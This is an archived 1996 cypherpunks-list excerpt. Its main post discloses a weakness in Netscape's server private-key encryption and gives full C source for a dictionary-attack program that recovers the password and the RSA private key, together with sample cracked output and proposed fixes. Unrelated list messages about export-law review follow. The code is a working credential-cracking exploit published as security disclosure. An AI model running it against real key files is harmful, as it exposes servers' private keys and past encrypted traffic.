25 14:42:23 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Thu, 26 Sep 1996 05:42:23 +0800 Subject: [Long] How to break Netscape's server key encryption Message-ID: <84366802803808@cs26.cs.auckland.ac.nz> The Netscape server key format is very susceptible to both a dictionary attack and to keystream recovery. It uses the PKCS #8 format for private keys, which provides a large amount of known plaintext at the start of the data, in combination with RC4 without any form of IV or other preprocessing (even though PKCS #8 recommends that PKCS #5 password-based encryption be used), which means you can recover the first 100-odd bytes of key stream with a simple XOR (the same stupid mistake Microsoft made with their .PWL files). This means two things: 1. It's very simple to write a program to perform a dictionary attack on the server key (it took me about half an hour using cryptlib, and another half hour to rip the appropriate code out of cryptlib to create a standalone program). 2. The recovered key stream from the encrypted server key can be used to decrypt any other resource encrypted with the server password, *without knowing the password*. This is because there's enough known plaintext (ASN.1 objects, object identifiers, and public key components) at the start of the encrypted data to recover large quantities of key stream. To demonstrate the problem, I have written a program which performs a dictionary attack on the server key, and if successful prints the password used to encrypt it and the server's RSA private key. Originally I used my encryption library (http://www.cs.auckland.ac.nz/~pgut001/cryptlib.html) to do the encryption, to turn it into a standalone program I ripped the necessary parts out of the library, which means it's a bit messy and not as portable as the original was. The code could probably be made to run about twice as fast if it's properly optimised, but I don't know if it's worth the bother and besides, it's just gone 4am I could use some sleep. To run it, use: breaksk Here's the output from a server key someone sent me, tested against my 100MB+ word list collection (some people collect stamps, I collect word lists :-): The password used to encrypt this Netscape server key is 'unguessable'. Modulus = 00D50626580C2543378FD249994A543FBF5FF1333E70684E942EC7034E5FA [...] Public exponent = 03 Private exponent = 008E0419900818D77A5FE18666318D7FD4EAA0CCD44AF03462C9 [...] Prime 1 = 00FBD3FC2CE1F50B31323F2D3FA27F6708D4373CC0487DB7199A712124380 [...] Prime 2 = 00D88D984BA6A7CD07F6608D95D3AC2682769DA904D061E593CF86A21B4A9 [...] Exponent 1 = 00A7E2A81DEBF8B220CC2A1E2A6C54EF5B3824D32ADAFE7A1111A0C0C2 [...] Exponent 2 = 00905E6587C46FDE054EEB090E8D1D6F01A4691B588AEBEE628A59C167 [...] Coefficient = 2DEBC012356B96D2206346141371D999288F55DD07AEF6D1972383E97 [...] (I've trimmed some of the lines a bit). The problem here is caused by a combination of the PKCS #8 format (which is rather nonoptimal for protecting private keys) and the use of RC4 to encryt fixed, known plaintext. Since everything is constant, you don't even need to run the password-transformation process more than once - just store a dictionary of the resulting key stream for each password in a database, and you can break the encryption with a single lookup (this would be avoided by the use of PKCS #5 password-based encryption, which iterates the key setup and uses a salt to make a precomputed dictionary attack impossible. PKCS #5 states that its primary intended application is for protecting private keys, but Netscape chose not to use this and went with straight RC4 instead). A quick (but not necessarily optimal) solution to the problem involves two changes: 1. Only encrypt the unknown, private fields in the key (which is what PGP does). Instead of wrapping everything up in several layers of encapsulation with object identifiers and public-key components, change the portion which is encrypted to: EncryptedRSAPrivateKey ::= SEQUENCE { privateExponent INTEGER, prime1 INTEGER, prime2 INTEGER, exponent1 INTEGER, exponent2 INTEGER, coefficient INTEGER } with everything else outside this object. 2. Don't use a simple stream cipher to encrypt fixed data like this. Use an IV on the encrypted data. Iterate the password setup to slow down a dictionary attack (I posted a scheme for transforming variable to fixed-length keys to the cypherpunks list a few days ago which provides the necessary functionality). The consequences of this attack are pretty scary. It involves vastly less effort than breaking a 40-bit session key or factoring a 512-bit public key, yet once you've recovered the private key you can also recover every session key it's ever protected in the past and will ever protect in the future (which is why I'm a fan of signed DH for session key exchange). The ease with which a dictionary attack can be carried out represents a critical weakness which compromises all other encryption components on the server - spending a few days with a Markov-model based phrase generator on a PC is still a lot easier than spending a few months with GNFS and a workstation farm. It seems strange that there are no real standards defined for secure storage of such a critical component as a private key. Although a lot of work has gone into X.509 and the multitude of related public-key certificate standards, the only generally-used private-key formats are PKCS #8 (which has problems, as demonstrated above), and Microsofts recently-proposed PFX (Personal Information Exchange) data format and protocol (PFX is designed to allow users to move their keys, certificates and other personal information securely from one platform to another, you can get more info on it from http://www.microsoft.com/intdev/security/misf11_7.htm), which is too new to comment on. It would be useful if a portable, secure private-key format at the same level as the X.509 effort were developed to solve this problem. For the curious (and ASN.1-aware), here's what the data formats look like. First there's the outer encapsulation which Netscape use to wrap up the encrypted key: NetscapeServerKey ::= SEQUENCE { identifier OCTET STRING ('private-key'), encryptedPrivateKeyInfo EncryptedPrivateKeyInfo } Inside this is a PKCS #8 private key: EncryptedPrivateKeyInfo ::= SEQUENCE { encryptionAlgorithm EncryptionAlgorithmIdentifier, encryptedData EncryptedData } EncryptionAlgorithmIdentifier ::= AlgorithmIdentifier EncryptedData = OCTET STRING Now the EncryptionAlgorithmIdentifier is supposed to be something like pbeWithMD5AndDES, with an associated 64-bit salt and iteration count, but Netscape ignored this and used straight rc4 with no salt or iteration count. The EncryptedData decrypts to: PrivateKeyInfo ::= SEQUENCE { version Version privateKeyAlgorithm PrivateKeyAlgorithmIdentifier privateKey PrivateKey attributes [ 0 ] IMPLICIT Attributes OPTIONAL } Version ::= INTEGER PrivateKeyAlgorithmIdentifier ::= AlgorithmIdentifier PrivateKey ::= OCTET STRING Attributes ::= SET OF Attribute The algorithm information is encoded as: AlgorithmIdentifier ::= SEQUENCE { algorithm ALGORITHM.&id( { SupportedAlgorithms } ), parameters ALGORITHM.&Type( { SupportedAlgorithms }{ @algorithm } ) OPTIONAL } SupportedAlgorithms ALGORITHM ::= { ... } ALGORITHM ::= TYPE-IDENTIFIER (and so on and so on, I haven't bothered going down any further). The EncryptionAlgorithmIdentifier is '1 2 840 113549 3 4' or { iso(1) member-body(2) US(840) rsadsi(113549) algorithm(3) rc4(4) }. The PrivateKeyAlgorithmIdentifier is '1 2 840 113549 1 1 1' or { iso(1) member-body(2) US(840) rsadsi(113549) pkcs(1) pkcs1-1(1) rsaEncryption(1) }. Included below is the code to perform the attack (set tabs to 4, phasers to stun). Do I get a t-shirt for this? :-) Peter. -- Snip -- /* BreakSK - Break Netscape server key file encryption via dictionary attack. Written by Peter Gutmann 26 September 1996 */ #include #include #include /* Most of the code here was ripped out of cryptlib and is somewhat messy as a consquence. cryptlib has fairly extensive self-configuration and an internal API which hides machine-specific details, this program doesn't (the code here really wasn't meant for standalone use). As a result you need to manually define LITTLE_ENDIAN or BIG_ENDIAN, and it won't work at all on 64-bit systems. If you want the portability, use cryptlib instead */ #define LITTLE_ENDIAN /* #define BIG_ENDIAN */ /* Workarounds for cryptlib defines, constants, and macros */ #define MASK32(x) x #define FALSE 0 #define TRUE !FALSE typedef unsigned char BYTE; typedef unsigned long LONG; typedef int BOOLEAN; /* Functions to convert the endianness from the canonical form to the internal form. bigToLittle() convert from big-endian in-memory to little-endian in-CPU, littleToBig() convert from little-endian in-memory to big-endian in-CPU */ void longReverse( LONG *buffer, int count ); #ifdef LITTLE_ENDIAN #define bigToLittleLong( x, y ) longReverse(x,y) #define littleToBigLong( x, y ) #else #define bigToLittleLong( x, y ) #define littleToBigLong( x, y ) longReverse(x,y) #endif /* LITTLE_ENDIAN */ /* Byte-reverse an array of 16- and 32-bit words to/from network byte order to account for processor endianness. These routines assume the given count is a multiple of 16 or 32 bits. They are safe even for CPU's with a word size > 32 bits since on a little-endian CPU the important 32 bits are stored first, so that by zeroizing the first 32 bits and oring the reversed value back in we don't need to rely on the processor only writing 32 bits into memory */ void longReverse( LONG *buffer, int count ) { #if defined( _BIG_WORDS ) BYTE *bufPtr = ( BYTE * ) buffer, temp; count /= 4; /* sizeof( LONG ) != 4 */ while( count-- ) { /* There's really no nice way to do this - the above code generates misaligned accesses on processors with a word size > 32 bits, so we have to work at the byte level (either that or turn misaligned access warnings off by trapping the signal the access corresponds to. However a context switch per memory access is probably somewhat slower than the current byte-twiddling mess) */ temp = bufPtr[ 3 ]; bufPtr[ 3 ] = bufPtr[ 0 ]; bufPtr[ 0 ] = temp; temp = bufPtr[ 2 ]; bufPtr[ 2 ] = bufPtr[ 1 ]; bufPtr[ 1 ] = temp; bufPtr += 4; } #else LONG value; count /= sizeof( LONG ); while( count-- ) { value = *buffer; value = ( ( value & 0xFF00FF00UL ) >> 8 ) | \ ( ( value & 0x00FF00FFUL ) << 8 ); *buffer++ = ( value << 16 ) | ( value >> 16 ); } #endif /* _BIG_WORDS */ } #define mputLLong(memPtr,data) \ memPtr[ 0 ] = ( BYTE ) ( ( data ) & 0xFF ); \ memPtr[ 1 ] = ( BYTE ) ( ( ( data ) >> 8 ) & 0xFF ); \ memPtr[ 2 ] = ( BYTE ) ( ( ( data ) >> 16 ) & 0xFF ); \ memPtr[ 3 ] = ( BYTE ) ( ( ( data ) >> 24 ) & 0xFF ); \ memPtr += 4 /**************************************************************************** * * * MD5 * * * ****************************************************************************/ /* The MD5 block size and message digest sizes, in bytes */ #define MD5_DATASIZE 64 #define MD5_DIGESTSIZE 16 /* The structure for storing MD5 info */ typedef struct { LONG digest[ 4 ]; /* Message digest */ LONG countLo, countHi; /* 64-bit bit count */ LONG data[ 16 ]; /* MD5 data buffer */ #ifdef _BIG_WORDS BYTE dataBuffer[ MD5_DATASIZE ]; /* Byte buffer for data */ #endif /* _BIG_WORDS */ BOOLEAN done; /* Whether final digest present */ } MD5_INFO; /* Round 1 shift amounts */ #define S11 7 #define S12 12 #define S13 17 #define S14 22 /* Round 2 shift amounts */ #define S21 5 #define S22 9 #define S23 14 #define S24 20 /* Round 3 shift amounts */ #define S31 4 #define S32 11 #define S33 16 #define S34 23 /* Round 4 shift amounts */ #define S41 6 #define S42 10 #define S43 15 #define S44 21 /* F, G, H and I are basic MD5 functions */ #define F(X,Y,Z) ( ( X & Y ) | ( ~X & Z ) ) #define G(X,Y,Z) ( ( X & Z ) | ( Y & ~Z ) ) #define H(X,Y,Z) ( X ^ Y ^ Z ) #define I(X,Y,Z) ( Y ^ ( X | ~Z ) ) /* ROTATE_LEFT rotates x left n bits */ #define ROTATE_LEFT(x,n) ( ( x << n ) | ( x >> ( 32 - n ) ) ) /* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4 */ #define FF(A,B,C,D,X,shiftAmt,magicConst) \ A += F( B, C, D ) + X + magicConst; \ A = MASK32( ROTATE_LEFT( MASK32( A ), shiftAmt ) + B ) #define GG(A,B,C,D,X,shiftAmt,magicConst) \ A += G( B, C, D ) + X + magicConst; \ A = MASK32( ROTATE_LEFT( MASK32( A ), shiftAmt ) + B ) #define HH(A,B,C,D,X,shiftAmt,magicConst) \ A += H( B, C, D ) + X + magicConst; \ A = MASK32( ROTATE_LEFT( MASK32( A ), shiftAmt ) + B ) #define II(A,B,C,D,X,shiftAmt,magicConst) \ A += I( B, C, D ) + X + magicConst; \ A = MASK32( ROTATE_LEFT( MASK32( A ), shiftAmt ) + B ) /* Basic MD5 step. Transforms digest based on data. Note that if the Mysterious Constants are arranged backwards in little-endian order and decrypted with DES they produce OCCULT MESSAGES! */ void MD5Transform( LONG *digest, LONG *data ) { LONG A, B, C, D; /* Set up local data */ A = digest[ 0 ]; B = digest[ 1 ]; C = digest[ 2 ]; D = digest[ 3 ]; /* Round 1 */ FF( A, B, C, D, data[ 0 ], S11, 3614090360UL ); /* 1 */ FF( D, A, B, C, data[ 1 ], S12, 3905402710UL ); /* 2 */ FF( C, D, A, B, data[ 2 ], S13, 606105819UL ); /* 3 */ FF( B, C, D, A, data[ 3 ], S14, 3250441966UL ); /* 4 */ FF( A, B, C, D, data[ 4 ], S11, 4118548399UL ); /* 5 */ FF( D, A, B, C, data[ 5 ], S12, 1200080426UL ); /* 6 */ FF( C, D, A, B, data[ 6 ], S13, 2821735955UL ); /* 7 */ FF( B, C, D, A, data[ 7 ], S14, 4249261313UL ); /* 8 */ FF( A, B, C, D, data[ 8 ], S11, 1770035416UL ); /* 9 */ FF( D, A, B, C, data[ 9 ], S12, 2336552879UL ); /* 10 */ FF( C, D, A, B, data[ 10 ], S13, 4294925233UL ); /* 11 */ FF( B, C, D, A, data[ 11 ], S14, 2304563134UL ); /* 12 */ FF( A, B, C, D, data[ 12 ], S11, 1804603682UL ); /* 13 */ FF( D, A, B, C, data[ 13 ], S12, 4254626195UL ); /* 14 */ FF( C, D, A, B, data[ 14 ], S13, 2792965006UL ); /* 15 */ FF( B, C, D, A, data[ 15 ], S14, 1236535329UL ); /* 16 */ /* Round 2 */ GG( A, B, C, D, data[ 1 ], S21, 4129170786UL ); /* 17 */ GG( D, A, B, C, data[ 6 ], S22, 3225465664UL ); /* 18 */ GG( C, D, A, B, data[ 11 ], S23, 643717713UL ); /* 19 */ GG( B, C, D, A, data[ 0 ], S24, 3921069994UL ); /* 20 */ GG( A, B, C, D, data[ 5 ], S21, 3593408605UL ); /* 21 */ GG( D, A, B, C, data[ 10 ], S22, 38016083UL ); /* 22 */ GG( C, D, A, B, data[ 15 ], S23, 3634488961UL ); /* 23 */ GG( B, C, D, A, data[ 4 ], S24, 3889429448UL ); /* 24 */ GG( A, B, C, D, data[ 9 ], S21, 568446438UL ); /* 25 */ GG( D, A, B, C, data[ 14 ], S22, 3275163606UL ); /* 26 */ GG( C, D, A, B, data[ 3 ], S23, 4107603335UL ); /* 27 */ GG( B, C, D, A, data[ 8 ], S24, 1163531501UL ); /* 28 */ GG( A, B, C, D, data[ 13 ], S21, 2850285829UL ); /* 29 */ GG( D, A, B, C, data[ 2 ], S22, 4243563512UL ); /* 30 */ GG( C, D, A, B, data[ 7 ], S23, 1735328473UL ); /* 31 */ GG( B, C, D, A, data[ 12 ], S24, 2368359562UL ); /* 32 */ /* Round 3 */ HH( A, B, C, D, data[ 5 ], S31, 4294588738UL ); /* 33 */ HH( D, A, B, C, data[ 8 ], S32, 2272392833UL ); /* 34 */ HH( C, D, A, B, data[ 11 ], S33, 1839030562UL ); /* 35 */ HH( B, C, D, A, data[ 14 ], S34, 4259657740UL ); /* 36 */ HH( A, B, C, D, data[ 1 ], S31, 2763975236UL ); /* 37 */ HH( D, A, B, C, data[ 4 ], S32, 1272893353UL ); /* 38 */ HH( C, D, A, B, data[ 7 ], S33, 4139469664UL ); /* 39 */ HH( B, C, D, A, data[ 10 ], S34, 3200236656UL ); /* 40 */ HH( A, B, C, D, data[ 13 ], S31, 681279174UL ); /* 41 */ HH( D, A, B, C, data[ 0 ], S32, 3936430074UL ); /* 42 */ HH( C, D, A, B, data[ 3 ], S33, 3572445317UL ); /* 43 */ HH( B, C, D, A, data[ 6 ], S34, 76029189UL ); /* 44 */ HH( A, B, C, D, data[ 9 ], S31, 3654602809UL ); /* 45 */ HH( D, A, B, C, data[ 12 ], S32, 3873151461UL ); /* 46 */ HH( C, D, A, B, data[ 15 ], S33, 530742520UL ); /* 47 */ HH( B, C, D, A, data[ 2 ], S34, 3299628645UL ); /* 48 */ /* Round 4 */ II( A, B, C, D, data[ 0 ], S41, 4096336452UL ); /* 49 */ II( D, A, B, C, data[ 7 ], S42, 1126891415UL ); /* 50 */ II( C, D, A, B, data[ 14 ], S43, 2878612391UL ); /* 51 */ II( B, C, D, A, data[ 5 ], S44, 4237533241UL ); /* 52 */ II( A, B, C, D, data[ 12 ], S41, 1700485571UL ); /* 53 */ II( D, A, B, C, data[ 3 ], S42, 2399980690UL ); /* 54 */ II( C, D, A, B, data[ 10 ], S43, 4293915773UL ); /* 55 */ II( B, C, D, A, data[ 1 ], S44, 2240044497UL ); /* 56 */ II( A, B, C, D, data[ 8 ], S41, 1873313359UL ); /* 57 */ II( D, A, B, C, data[ 15 ], S42, 4264355552UL ); /* 58 */ II( C, D, A, B, data[ 6 ], S43, 2734768916UL ); /* 59 */ II( B, C, D, A, data[ 13 ], S44, 1309151649UL ); /* 60 */ II( A, B, C, D, data[ 4 ], S41, 4149444226UL ); /* 61 */ II( D, A, B, C, data[ 11 ], S42, 3174756917UL ); /* 62 */ II( C, D, A, B, data[ 2 ], S43, 718787259UL ); /* 63 */ II( B, C, D, A, data[ 9 ], S44, 3951481745UL ); /* 64 */ /* Build message digest */ digest[ 0 ] = MASK32( digest[ 0 ] + A ); digest[ 1 ] = MASK32( digest[ 1 ] + B ); digest[ 2 ] = MASK32( digest[ 2 ] + C ); digest[ 3 ] = MASK32( digest[ 3 ] + D ); } /**************************************************************************** * * * MD5 Support Routines * * * ****************************************************************************/ /* The routine md5Initial initializes the message-digest context md5Info */ void md5Initial( MD5_INFO *md5Info ) { /* Clear all fields */ memset( md5Info, 0, sizeof( MD5_INFO ) ); /* Load magic initialization constants */ md5Info->digest[ 0 ] = 0x67452301L; md5Info->digest[ 1 ] = 0xEFCDAB89L; md5Info->digest[ 2 ] = 0x98BADCFEL; md5Info->digest[ 3 ] = 0x10325476L; /* Initialise bit count */ md5Info->countLo = md5Info->countHi = 0L; } /* The routine MD5Update updates the message-digest context to account for the presence of each of the characters buffer[ 0 .. count-1 ] in the message whose digest is being computed */ void md5Update( MD5_INFO *md5Info, BYTE *buffer, int count ) { LONG tmp; int dataCount; /* Update bitcount */ tmp = md5Info->countLo; if ( ( md5Info->countLo = tmp + ( ( LONG ) count << 3 ) ) < tmp ) md5Info->countHi++; /* Carry from low to high */ md5Info->countHi += count >> 29; /* Get count of bytes already in data */ dataCount = ( int ) ( tmp >> 3 ) & 0x3F; /* Handle any leading odd-sized chunks */ if( dataCount ) { #ifdef _BIG_WORDS BYTE *p = md5Info->dataBuffer + dataCount; #else BYTE *p = ( BYTE * ) md5Info->data + dataCount; #endif /* _BIG_WORDS */ dataCount = MD5_DATASIZE - dataCount; if( count < dataCount ) { memcpy( p, buffer, count ); return; } memcpy( p, buffer, dataCount ); #ifdef _BIG_WORDS copyToLLong( md5Info->data, md5Info->dataBuffer, MD5_DATASIZE ); #else littleToBigLong( md5Info->data, MD5_DATASIZE ); #endif /* _BIG_WORDS */ MD5Transform( md5Info->digest, md5Info->data ); buffer += dataCount; count -= dataCount; } /* Process data in MD5_DATASIZE chunks */ while( count >= MD5_DATASIZE ) { #ifdef _BIG_WORDS memcpy( md5Info->dataBuffer, buffer, MD5_DATASIZE ); copyToLLong( md5Info->data, md5Info->dataBuffer, MD5_DATASIZE ); #else memcpy( md5Info->data, buffer, MD5_DATASIZE ); littleToBigLong( md5Info->data, MD5_DATASIZE ); #endif /* _BIG_WORDS */ MD5Transform( md5Info->digest, md5Info->data ); buffer += MD5_DATASIZE; count -= MD5_DATASIZE; } /* Handle any remaining bytes of data. */ #ifdef _BIG_WORDS memcpy( md5Info->dataBuffer, buffer, count ); #else memcpy( md5Info->data, buffer, count ); #endif /* _BIG_WORDS */ } /* Final wrapup - pad to MD5_DATASIZE-byte boundary with the bit pattern 1 0* (64-bit count of bits processed, MSB-first) */ void md5Final( MD5_INFO *md5Info ) { int count; BYTE *dataPtr; /* Compute number of bytes mod 64 */ count = ( int ) md5Info->countLo; count = ( count >> 3 ) & 0x3F; /* Set the first char of padding to 0x80. This is safe since there is always at least one byte free */ #ifdef _BIG_WORDS dataPtr = md5Info->dataBuffer + count; #else dataPtr = ( BYTE * ) md5Info->data + count; #endif /* _BIG_WORDS */ *dataPtr++ = 0x80; /* Bytes of padding needed to make 64 bytes */ count = MD5_DATASIZE - 1 - count; /* Pad out to 56 mod 64 */ if( count < 8 ) { /* Two lots of padding: Pad the first block to 64 bytes */ memset( dataPtr, 0, count ); #ifdef _BIG_WORDS copyToLLong( md5Info->data, md5Info->dataBuffer, MD5_DATASIZE ); #else littleToBigLong( md5Info->data, MD5_DATASIZE ); #endif /* _BIG_WORDS */ MD5Transform( md5Info->digest, md5Info->data ); /* Now fill the next block with 56 bytes */ #ifdef _BIG_WORDS memset( md5Info->dataBuffer, 0, MD5_DATASIZE - 8 ); #else memset( md5Info->data, 0, MD5_DATASIZE - 8 ); #endif /* _BIG_WORDS */ } else /* Pad block to 56 bytes */ memset( dataPtr, 0, count - 8 ); #ifdef _BIG_WORDS copyToLLong( md5Info->data, md5Info->dataBuffer, MD5_DATASIZE ); #endif /* _BIG_WORDS */ /* Append length in bits and transform */ md5Info->data[ 14 ] = md5Info->countLo; md5Info->data[ 15 ] = md5Info->countHi; #ifndef _BIG_WORDS littleToBigLong( md5Info->data, MD5_DATASIZE - 8 ); #endif /* _BIG_WORDS */ MD5Transform( md5Info->digest, md5Info->data ); md5Info->done = TRUE; } /**************************************************************************** * * * RC4 * * * ****************************************************************************/ /* If the system can handle byte ops, we use those so we don't have to do a lot of masking. Otherwise, we use machine-word-size ops which will be faster on RISC machines */ #if UINT_MAX > 0xFFFFL /* System has 32-bit ints */ #define USE_LONG_RC4 typedef unsigned int rc4word; #else typedef unsigned char rc4word; #endif /* UINT_MAX > 0xFFFFL */ /* The scheduled RC4 key */ typedef struct { rc4word state[ 256 ]; rc4word x, y; } RC4KEY ; /* Expand an RC4 key */ void rc4ExpandKey( RC4KEY *rc4, unsigned char const *key, int keylen ) { int x, keypos = 0; rc4word sx, y = 0; rc4word *state = &rc4->state[ 0 ]; rc4->x = rc4->y = 0; for( x = 0; x < 256; x++ ) state[ x ] = x; for( x = 0; x < 256; x++ ) { sx = state[ x ]; y += sx + key[ keypos ]; #ifdef USE_LONG_RC4 y &= 0xFF; #endif /* USE_LONG_RC4 */ state[ x ] = state[ y ]; state[ y ] = sx; if( ++keypos == keylen ) keypos = 0; } } void rc4Crypt( RC4KEY *rc4, unsigned char *data, int len ) { rc4word x = rc4->x, y = rc4->y; rc4word sx, sy; rc4word *state = &rc4->state[ 0 ]; while (len--) { x++; #ifdef USE_LONG_RC4 x &= 0xFF; #endif /* USE_LONG_RC4 */ sx = state[ x ]; y += sx; #ifdef USE_LONG_RC4 y &= 0xFF; #endif /* USE_LONG_RC4 */ sy = state[ y ]; state[ y ] = sx; state[ x ] = sy; #ifdef USE_LONG_RC4 *data++ ^= state[ ( unsigned char ) ( sx+sy ) ]; #else *data++ ^= state[ ( sx+sy ) & 0xFF ]; #endif /* USE_LONG_RC4 */ } rc4->x = x; rc4->y = y; } /**************************************************************************** * * * Driver Code * * * ****************************************************************************/ /* Various magic values in the key file */ static BYTE netscapeKeyfileID[] = { 0x04, 0x0B, 0x70, 0x72, 0x69, 0x76, 0x61, 0x74, 0x65, 0x2D, 0x6B, 0x65, 0x79 }; static BYTE rc4EncryptionID[] = { 0x30, 0x0C, 0x06, 0x08, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x03, 0x04, 0x05, 0x00 }; static BYTE version[] = { 0x02, 0x01, 0x00 }; static BYTE rsaPrivateKeyID[] = { 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00 }; /* General-purpose buffer. We make them static buffers to keep them off the stack on DOS/Win16 boxes */ static BYTE buffer[ 1024 ], temp[ 1024 ]; /* Print a key component */ int printKeyComponent( BYTE *buffer, char *title ) { int count, length = 0, totalLength = 2; printf( "%s = ", title ); if( *buffer++ != 0x02 ) { puts( "Bad data format in key component." ); return( 0 ); } /* Get the length of the component */ if( *buffer & 0x80 ) { count = *buffer++ & 0x7F; totalLength += count; while( count-- ) length = ( length << 8 ) | *buffer++; } else length = *buffer++; totalLength += length; /* Print the data */ for( count = 0; count < length; count++ ) printf( "%02X", buffer[ count ] ); putchar( '\n' ); return( totalLength ); } /* The main program */ int main( int argc, char *argv[] ) { FILE *keyFile, *dictFile; int count, length = 0; /* Check args and open the server key file */ if( argc != 3 ) { puts( "Usage: breaksk " ); return( EXIT_FAILURE ); } if( ( keyFile = fopen( argv[ 1 ], "rb" ) ) == NULL ) { perror( argv[ 1 ] ); return( EXIT_FAILURE ); } /* Read the Netscape outer wrapper */ if( getc( keyFile ) != 0x30 ) { puts( "This doesn't look like a Netscape server key file." ); exit( EXIT_FAILURE ); } count = getc( keyFile ) & 0x7F; while( count-- ) getc( keyFile ); if( ( fread( buffer, 1, 13, keyFile ) != 13 ) || \ memcmp( buffer, netscapeKeyfileID, 13 ) ) { puts( "This doesn't look like a Netscape server key file." ); exit( EXIT_FAILURE ); } /* Read the PKCS #8 EncryptedPrivateKey wrapper */ if( getc( keyFile ) != 0x30 ) { puts( "This doesn't look like a Netscape server key file." ); exit( EXIT_FAILURE ); } count = getc( keyFile ) & 0x7F; while( count-- ) getc( keyFile ); if( ( fread( buffer, 1, 14, keyFile ) != 14 ) || \ memcmp( buffer, rc4EncryptionID, 14 ) ) { puts( "This doesn't look like an RC4-encrypted server key." ); exit( EXIT_FAILURE ); } /* Read the start of the EncryptedData field */ if( getc( keyFile ) != 0x04 ) { puts( "This doesn't look like a Netscape server key file." ); exit( EXIT_FAILURE ); } count = getc( keyFile ) & 0x7F; while( count-- ) length = ( length << 8 ) | getc( keyFile ); /* Read the encrypted RSAPrivateKey */ if( fread( buffer, 1, length, keyFile ) != length ) { puts( "Netscape server key file length fields are inconsistent." ); exit( EXIT_FAILURE ); } fclose( keyFile ); /* We've got the data we want, now rumble through the dictionary trying each key on it. First, make sure we can open the thing */ if( ( dictFile = fopen( argv[ 2 ], "r" ) ) == NULL ) { perror( argv[ 2 ] ); return( EXIT_FAILURE ); } while( TRUE ) { BYTE hashedPassword[ MD5_DIGESTSIZE ], *hashedPassPtr = hashedPassword; MD5_INFO md5Info; RC4KEY rc4key; char dictWord[ 100 ]; int dictWordLength, index; /* Get the next word from the dictionary */ if( fgets( dictWord, 100, dictFile ) == NULL ) { puts( "No more words in dictionary." ); break; } dictWordLength = strlen( dictWord ) - 1; dictWord[ dictWordLength ] = '\0'; /* Hash the word using MD5 */ md5Initial( &md5Info ); md5Update( &md5Info, ( BYTE * ) dictWord, dictWordLength ); md5Final( &md5Info ); for( index = 0; index < MD5_DIGESTSIZE / 4; index++ ) { mputLLong( hashedPassPtr, md5Info.digest[ index ] ); } /* Set up the RC4 key based on the hashed password */ rc4ExpandKey( &rc4key, hashedPassword, MD5_DIGESTSIZE ); /* Copy the data to a temporary buffer and try to decrypt it */ memcpy( temp, buffer, length ); rc4Crypt( &rc4key, temp, 22 ); /* Check for known plaintext */ if( temp[ 0 ] != 0x30 || !( temp[ 1 ] & 0x80 ) ) continue; index = 1; count = temp[ index++ ] & 0x7F; while( count-- ) index++; if( memcmp( temp + index, version, 3 ) ) continue; index += 3; if( memcmp( temp + index, rsaPrivateKeyID, 15 ) ) continue; /* We've found the password, display it and decrypt the rest of the key */ printf( "The password used to encrypt this Netscape server key " "is '%s'.\n\n", dictWord ); index += 15; rc4Crypt( &rc4key, temp + 22, length - 22 ); /* Skip the OCTET STRING encapsulation */ if( temp[ index++ ] != 0x04 ) { /* Should never happen */ puts( "Bad data format in key file" ); break; } count = temp[ index++ ] & 0x7F; while( count-- ) index++; /* Skip the inner SEQUENCE encapsulation */ if( temp[ index++ ] != 0x30 ) { /* Should never happen */ puts( "Bad data format in key file" ); break; } count = temp[ index++ ] & 0x7F; while( count-- ) index++; /* Skip the version number. NB: This encoding is incorrect and violates the ASN.1 encoding rules. It's strange that the outer version number is encoded correctly, but the inner one isn't */ if( temp[ index++ ] != 0x02 || temp[ index++ ] != 0x00 ) { /* Should never happen */ puts( "Bad data format in key file" ); break; } /* OK, now we've reached the key components. Print each one out */ index += printKeyComponent( temp + index, "Modulus" ); index += printKeyComponent( temp + index, "Public exponent" ); index += printKeyComponent( temp + index, "Private exponent" ); index += printKeyComponent( temp + index, "Prime 1" ); index += printKeyComponent( temp + index, "Prime 2" ); index += printKeyComponent( temp + index, "Exponent 1" ); index += printKeyComponent( temp + index, "Exponent 2" ); index += printKeyComponent( temp + index, "Coefficient" ); break; } fclose( dictFile ); return( EXIT_SUCCESS ); } From declan at eff.org Wed Sep 25 15:14:38 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 26 Sep 1996 06:14:38 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <199609251126.HAA23625@pdj2-ra.F-REMOTE.CWRU.Edu> Message-ID: At today's SAFE crypto hearing in the House, Congressperns quizzed Gorelick about what the fuck the administration is trying to do by having their lackies attach amendments to the omnibus export act that would prevent judicial review of Commerce Dept export control decisions. It's already cleared the House. "no court shall have power or jurisdiction to review any such decision by an action in the nature of mandamus or otherwise." Bastards. -Declan On Wed, 25 Sep 1996, Peter D. Junger wrote: > Greg Broiles writes in a most informative posting: > > : And that's what the ITAR is - a body of administrative law developed by the > : executive branch pursuant to a grant of power from Congress. (e.g., 22 USC > : 2778(a)(1), ". . . The President is authorized to designate those items > : which shall be considered as defense articles and defense services for the > : purposes of this section and to promulgate regulations for the import and > : export of such articles and services. The items so designated shall > : constitute the United States Munitions List.") It is subject to review by > : the courts just like the product of Congress itself; and an agency can't do > : something Congress can't do, like write an unconstitutional law. > > It should be added though that most administrative regulations are > subject to judicial review by courts to make sure that they comply with > the law passed by Congress. The ITAR, on the other hand, are not > subject to this sort of review and can only be challenged in the courts > on Constitutional grounds. > > -- > Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH > Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu > URL: http://samsara.law.cwru.edu > // declan at eff.org // I do not represent the EFF // declan at well.com // From temanuel at mecklermedia.com Wed Sep 25 15:25:17 1996 From: temanuel at mecklermedia.com (Tom Emanuel) Date: Thu, 26 Sep 1996 06:25:17 +0800 Subject: No Subject Message-ID: <199609251905.PAA17803@pizza.mecklermedia.com> Please take me off this list or send instructions for so doing. Tom Emanuel Vice President Publication Licensing, Mecklermedia Corporation, 20 Ketchum Street, Westport, CT 06880:fax: 203-454-5840; URL: http://www.iworld.com; temanuel at mecklermedia.com From deviant at pooh-corner.com Wed Sep 25 15:42:38 1996 From: deviant at pooh-corner.com (The Deviant) Date: Thu, 26 Sep 1996 06:42:38 +0800 Subject: WHO IS MAKING A MOCKERY OF WHOM? In-Reply-To: <199609251426.HAA02190@dfw-ix1.ix.netcom.com> Message-ID: On 